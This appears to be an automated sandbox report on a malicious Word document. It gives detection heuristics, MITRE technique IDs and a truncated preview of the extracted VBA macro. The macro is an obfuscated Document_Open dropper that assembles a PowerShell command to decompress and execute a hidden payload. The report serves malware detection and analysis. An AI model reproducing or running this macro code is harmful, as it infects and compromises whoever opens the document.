MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro with a Document_Open auto-execution routine that calls the Shell() function. This macro constructs and executes a PowerShell command, which is designed to download and execute a second-stage payload from a remote URL. The ClamAV detection 'Doc.Dropper.Agent-6605384-0' further supports its nature as a dropper.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6605424-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6605424-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: d69adf76aa280498c2d8eb3d1135d7beaf6f996e84a12255aa905d659152a6b0) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19793 bytes |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "iDwrLiOipbnFtX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
cRjOw = 41741 * Rwkpo + 27905 * khCOdB + (47077 / wwpjqq + jXLKOi - KcPFWz)
lnYaD = 355 * uiQUC + 70436 * NCPiFB + (52776 / oHTzW + iFrur - OSRvW)
jOrTsl = 10038 * ZGdqV + 69596 * OfbSS + (24873 / dzGqWa + YibCOQ - sWzMaS)
lTIFCq = 11627 * NFHWz + 67482 * vjGwf + (38253 / oRViUX + SEfWP - inHjl)
DBwHRh = 31847 * uDOzal + 58839 * kTWisu + (2206 / zkZdHY + LDYvn - OQnHh)
UZuMpRqkZ ("" + wltOqAJvzvNl + zRGFdQQYZaKK + sEBlEwzULMC + jnzdiXiIAVj + BjhwWVb + YoXzwXPPu + AWHjHmWW)
uBqrY = 42421 * iaKWA + 19529 * vBdKAI + (91671 / VmmwG + fULCVO - nhIYBL)
tmAMh = 72225 * JLVWH + 73368 * DEcPTD + (11963 / TfvzIU + mwwPo - AmjZwZ)
End Sub
Attribute VB_Name = "jwHrGdD"
Function sEBlEwzULMC()
On Error Resume Next
FGSfE = 56187 - NlzQf - 74660 + BiAAi + 24976 * DjnVf - 35470 * kwCNc + (51294 * jSuuM)
XzjwJIdnB = "pow" + rvMqaVzXVwXz + iJYKwdouCD + "ers" + RQGGWHoTprIos + ZjPEbKJnlVBI + "h" + wtJiiDjQPcQKik + kSGsPNm + "el" + hHcVkUwrYszz + nBIRnnRc + "l " + lljCEii + uBvGvfIS + "." + rpAaISrH + KTEicjwkvmuJqo + " ( " + ruNliVwS + kKbjNXmH + "([S" + wNiLjXWjPiw + zbzuLUpU + "TrI" + RzoJLYW + ooMdQBEHzRDz + "n"
hBQDoM = pJKpwz + pKjlUZ - 40670 * 7208 + 54271 / JkChG - ANRuqk - dEuUAt
wbIQd = mKGKMN + sOKHt - 19926 * 27984 + 46568 / mzjsG - pCiAD - phDIsw
fApCjRzO = "g" + cOssZHc + dZEuEJLi + "]" + cjEkEdFj + UKEBEIo + "$VE" + ZtkumMLcj + JSiOiYXdoPTa + "rBo" + nTVDpwVWU + rmSYsBWho + "se" + bpSfkKA + ThcwtpZt + "pRE" + mwzwrmEFv + tOWlrfkJLKVViw + "FE" + UiCcddZJ + qbtjEFlJaTG + "R" + JojsEQc + hckbskT + "enC" + MiNpJQfGQjUVq + bsntkUsb + "e)" + tQvdMAqKiuipU + NwAszhrac + "[" + zZiTTHCBPzjcDj + LIdmYIaX + "1,3" + iKGCqTdNDQjKa + TPTdWwJVWfSw + "]" + Chr(43) + ozGwbZsuNJQ + fNiAiGzEsGtzv + "'X'" + kWYUQlOQZMwwu + KNXGiHr + "-jo"
sNXwtM = 96663 - ADJrlw / 65360 - 9426 + zEnjH - fqvjc + 78009 - htqnbC + 27812 / XMORz / 83139 * LZQpB / 27092 + 20326 / sAkJrG - jWsHWQ
BUjwttkum = "i" + fqwasYRKNP + QmmfWGwnqt + "N''" + ZjsZpVzK + KLPkuTiavcbcPj + ")( " + zKBJilTmALj + sQUsUcbPmM + "Ne" + QwukwQI + VoITRYrdj + "W-" + qFDLHjvHdMNw + NnZCDvX + "o" + WbLZDDkm + sNLvjcNVBqB + "B" + mNDkSafnPSwjj + rDtaKUdr + "JE" + qZqZVjFNlYMzT + XqcuMOzj + "Ct " + wzawWIWArbB + tltSwXzrj + "io." + ndAwqiqtl + jiPOPpzbqK + "C" + jJTvAIHlOWL + HZKNkHDQVCOCj + "o" + sIkFFARn + qliKJMSEWIPo + "mPr" + CiMNGEt + AtGlGFr + "esS" + niuWZGMpvwNz + tfCboEj + "ION"
ZkiRDb = (zfRdB * KjEGAQ / uDBIp * GDdDl / (11390 + pUmuo + Ojwhh * CJUWW / DPJuVj * cqVIW * jXhtpu + RrCaw - TunDl / GViqLv))
ZLSta = (GBqVPi * MPLNjz / Papnjb * GzhVw / (81874 + kFZIzU + RDSnG * uFWcc / znwWiJ * LzDJzR * lbJmEj + kwWXAd - VAbEt / rDmju))
IQNuS = (RTSvj * sUPpb / ijcqzc * FQzhp / (51007 + FiUTkc + iLCDE * hAjbOK / QSXSRl * MFUmdV * RJAvEz + zUanuk - FjVSi / bmKBCw))
GLPZpOQzzJZ = ".de" + qQZjzPrfjJ + QwzfXASHWzTwi + "f" + wwsGMCbdJNK + NDoISBLo + "LAT" + fzUkCrwbFj + hoDzmoUoRMPKt + "E" + LfdEqlcM + SZmNmFBXVWAFT + "str" + TYETiKqkjk + ftGEbuHTPia + "EAm" + NmYvKGLO + MXtahcoGcq + "([S" + iOSYKLvHlz + UXSoVijN + "Ys" + thiUaracwp + IJdmwASZlOwiF + "TEm" + AkzGPYHU + plEjJzjjdPILi + ".i"
vXlijA = (QjarA * PSAosw / ONtbP * BcuBp / (4140 + WTAVq + paVYG * wARKO / SlbVi * KPVwmV * lpkMvS + wrGjtp - JQNkSf / WQoBlV))
KTrSSwz = "o.M" + rnzsVcOoVrj + fubsrAwHOUq + "Emo" + ZwKKwTYLP + wRjCYOavLvluas + "r" + bYdTIuGD + LvQzPPBhwZT + "Yst" + ztumSnCkRSHw + ZlBKckvCifOf + "RE" + swErfpdZOIoPP + dJBddbvuPqLnzP + "Am]" + mSJrVNQQzI + tWMVCIBWNC + "[" + wBpATBfKz + zGBYPsk + "s" + bZBsiplpNt + aruTYPwvdpXI + "yS" + OAjldcWXq + wWdQqwG + "Tem"
WOGFr = (nkrlBs * ObkFc / hODBW * bsSfm / (86219 + iEsAt + uzplfE * HZHCf / TqsCTN * mPkUFE * kKSWaq + iPsdXw - KClQz / YaqBZ))
rfPVf = (LkzGlb * IlazZv / ibMzE * DUKTR / (9
... (truncated)